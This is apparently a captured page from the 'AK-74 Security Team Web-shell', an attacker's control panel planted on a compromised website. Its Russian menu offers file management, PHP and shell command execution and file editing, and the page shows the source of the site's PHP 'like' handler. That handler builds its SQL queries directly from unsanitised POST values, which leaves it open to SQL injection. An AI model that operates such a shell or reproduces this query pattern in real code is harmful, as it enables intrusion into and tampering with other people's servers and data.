.:: :[ AK-74 Security Team Web-shell ]: ::.
Общая информация
Файловый менеджер
phpinfo()
Выполнить PHP
Выполнить команду
Редактирование файла
<?php session_start(); date_default_timezone_set("Asia/Bangkok"); @header("Content-Type: text/html; charset=utf-8"); if ( isset($_POST['like_id']) && isset($_SESSION['s_member_id']) ) { include("../include/connect.php"); $startFunctionDefault = 'no'; include("../include/function.php"); if ($_POST['like_action'] == 1) { // Insert model to like for this member $sql = " INSERT INTO member_like (member_id, like_id, like_date) VALUES ('" . $_SESSION['s_member_id'] . "', '" . $_POST['like_id'] . "', '" . @date("Y-m-d H:i:s"). "') "; sql_query($sql); $like_action = 0; } else { // end if ($_POST['like_action'] == 1) { // Delete model list like for this member $sql = " DELETE FROM member_like WHERE member_id = '" . $_SESSION['s_member_id'] . "' AND like_id = '" . $_POST['like_id'] . "' "; sql_query($sql); $like_action = 1; } // if ($_POST['like_action'] == 1) { $sql = " SELECT COUNT(member_id) AS all_like_qty FROM member_like WHERE like_id = '" . $_POST['like_id'] . "' "; $query = sql_query($sql); $rec = sql_fetch_array($query); $all_like_qty = $rec['all_like_qty']; $sql = " UPDATE member SET like_qty = '" . $all_like_qty . "' WHERE member_id = '" . $_POST['like_id'] . "' "; sql_query($sql); $sql = " SELECT like_qty FROM member WHERE member_id = '" . $_POST['like_id'] . "' "; $query = sql_query($sql); $rec = sql_fetch_array($query); $mode_action = 'get'; $mod_id = $_POST['like_id']; $like_qty = $rec['like_qty']; $output = createLikeTab($mode_action, $mod_id, $like_action, $like_qty, $_POST['showDetail']); //include("../disconnect-db.php"); echo $output; } // end if ( isset($_POST['like_id']) && isset($_SESSION['s_member_id']) ) { ?>
Rename:
-